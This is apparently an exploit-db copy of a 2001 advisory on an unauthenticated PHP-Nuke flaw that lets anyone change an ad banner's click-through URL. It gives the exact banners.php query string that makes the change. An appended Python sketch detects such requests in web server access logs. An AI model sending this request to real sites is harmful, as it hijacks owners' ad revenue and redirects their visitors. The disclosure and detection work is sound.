
PHP-Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change

Date: 02 Apr 2001
Reported by: Juan Diego
Type: exploitdb
Source: www.exploit-db.com

PHP-Nuke allows remote URL change in ad banners, risking ad revenue loss for targeted websites.

Code
source: https://www.securityfocus.com/bid/2544/info

PHP-Nuke is a website creation/maintenance tool written in PHP3.

A PHP-Nuke feature supporting cycling ad banners is subject to interference from a remote user.

A query string can be submitted to an unpatched server that lets the remote user specify a new destination URL, which is opened in a visitor's browser when the visitor clicks a PHP-Nuke site's ad banner.

By changing the click-through destination of a banner ad, an attacker could interfere with the target's ad-based revenue generation.

To change the URL of the first banner, enter the following in your browser:

http://target/banners.php?op=Change&bid=bannerid&url=http://where.to

If we want to change banner number 1 to redirect to

www.you_are_redir

we write:

http://www.example.com/banners.php?op=Change&bid=1&url=http://you.are.redir

(where www.example.com is the server running PHP-Nuke)
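
Because the change arrives as a plain query string, past use of it is visible in web server access logs. The following detection sketch is an added example, not part of the original advisory or of PHP-Nuke; it assumes combined-format access logs, and the sample log lines, client addresses and the `find_banner_changes` name are constructed for illustration:

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Apr/2001:10:01:12 +0000] "GET /banners.php?op=Change&bid=1&url=http://you.are.redir HTTP/1.0" 200 512 "-" "Mozilla/4.0"
198.51.100.4 - - [02/Apr/2001:10:02:40 +0000] "GET /banners.php?op=click&bid=1 HTTP/1.0" 302 0 "-" "Mozilla/4.0"
203.0.113.7 - - [02/Apr/2001:10:03:05 +0000] "GET /nuke/banners.php?bid=2&op=%43hange&url=http%3A%2F%2Fwhere.to HTTP/1.0" 200 512 "-" "Mozilla/4.0"
198.51.100.9 - - [02/Apr/2001:10:04:00 +0000] "GET /index.php HTTP/1.0" 200 4096 "-" "Mozilla/4.0"
"""

# client IP, timestamp, method, request target and status of one log line
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def find_banner_changes(log_text):
    """Return one dict per request that asks banners.php to change a banner URL."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        parts = urlsplit(m.group("target"))
        if not parts.path.lower().endswith("/banners.php"):
            continue
        # parse_qs percent-decodes values, so op=%43hange is caught as well
        params = parse_qs(parts.query, keep_blank_values=True)
        if "Change" not in params.get("op", []):
            continue  # only the op value shown in the advisory is flagged
        hits.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "status": int(m.group("status")),
            "bid": params.get("bid", [""])[0],
            "new_url": params.get("url", [""])[0],
        })
    return hits


if __name__ == "__main__":
    for hit in find_banner_changes(SAMPLE_LOG):
        print(hit)
```

Each hit records which banner id was targeted and the destination it was pointed at, which is what is needed to restore the original click-through URLs.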
